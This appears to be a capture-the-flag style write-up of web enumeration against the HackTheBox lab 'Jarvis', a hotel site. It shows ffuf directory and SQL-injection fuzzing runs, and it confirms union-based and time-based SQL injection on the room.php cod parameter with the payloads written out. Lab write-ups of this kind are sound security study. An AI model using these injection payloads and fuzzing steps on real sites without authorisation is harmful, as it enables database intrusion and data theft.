Web
Nmap discovered a web server running on the target port 80
Webroot
It’s a hotel
I noticed the domain information at the top
I appended it to the /etc/hosts file on Kali for local DNS resolution
wappalyzer identified technologies involved
The website is written in PHP
The passive crawler from Burp Suite enumerated the files and directories that are hard-coded into the web root
/dining-bar.php
It features a total of 6 dishes.
Those buttons aren’t functional.
/rooms-suites.php
The page also features a total of 6 rooms
Those buttons lead to the rooms.php file with the cod parameter
this appears to be a clear use of the php include() function, which can be abused for LFI
/rooms.php
I am unable to load the rooms.php file by itself as it re-directs to the index.php file
The cod parameter must be supplied.
So the rooms.php file is rather a display for the rooms-suites.php file
SQLi?
How ever I get a completely different result if I supply an arbitrary value to the cod parameter
This looks to me that it’s pulling data from a SQL query
I will try SQLi
Union-based SQLi (in-band)
-1 UNION SELECT 1,1,1,1,1,1,1#
SQLi confirmed!
Time-based SQLi (Blind or Out-of-Band)
┌──(kali㉿kali)-[~/archive/htb/labs/jarvis]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Fuzzing/SQLi/Generic-SQLi.txt -u http://supersecurehotel.htb/room.php?cod=FUZZ
________________________________________________
:: Method : GET
:: URL : http://supersecurehotel.htb/room.php?cod=FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Fuzzing/SQLi/Generic-SQLi.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
benchmark(10000000,MD5(1))# [Status: 200, Size: 5916, Words: 308, Lines: 190, Duration: 4041ms]
:: Progress: [267/267] :: Job [1/1] :: 46 req/sec :: Duration: [0:00:04] :: Errors: 2 ::Apparently, it works for Blind SQLi as well.
The testing payload was benchmark(10000000,MD5(1))#
Yeap, its paused.
sleep() works fine too
Fuzzing
┌──(kali㉿kali)-[~/archive/htb/labs/jarvis]
└─$ ffuf -c -w /usr/share/wordlists/seclists/discovery/web-content/directory-list-2.3-medium.txt -u http://$IP/FUZZ -ic -e .html,.txt,.php
________________________________________________
:: Method : GET
:: URL : http://10.10.10.143/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Extensions : .html .txt .php
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
images [status: 301, Size: 313, Words: 20, Lines: 10, Duration: 1592ms]
index.php [status: 200, Size: 23628, Words: 3014, Lines: 544, Duration: 2599ms]
nav.php [status: 200, Size: 1333, Words: 76, Lines: 44, Duration: 33ms]
footer.php [status: 200, Size: 2237, Words: 101, Lines: 69, Duration: 34ms]
css [status: 301, Size: 310, Words: 20, Lines: 10, Duration: 31ms]
js [status: 301, Size: 309, Words: 20, Lines: 10, Duration: 31ms]
fonts [status: 301, Size: 312, Words: 20, Lines: 10, Duration: 31ms]
phpmyadmin [status: 301, Size: 317, Words: 20, Lines: 10, Duration: 33ms]
connection.php [status: 200, Size: 0, Words: 1, Lines: 1, Duration: 36ms]
room.php [status: 302, Size: 3024, Words: 181, Lines: 102, Duration: 39ms]
sass [status: 301, Size: 311, Words: 20, Lines: 10, Duration: 35ms]
:: Progress: [882188/882188] :: Job [1/1] :: 1111 req/sec :: Duration: [0:12:25] :: Errors: 0 ::ffuf discovered some additional files and directories
/nav.php
The nav.php file appears to be the header
footer.php
It’s literally just the footer
/phpmyadmin/
There is an instance of PHPMyAdmin , but I don’t have a valid credential for now
connection.php
It doesn’t display anything.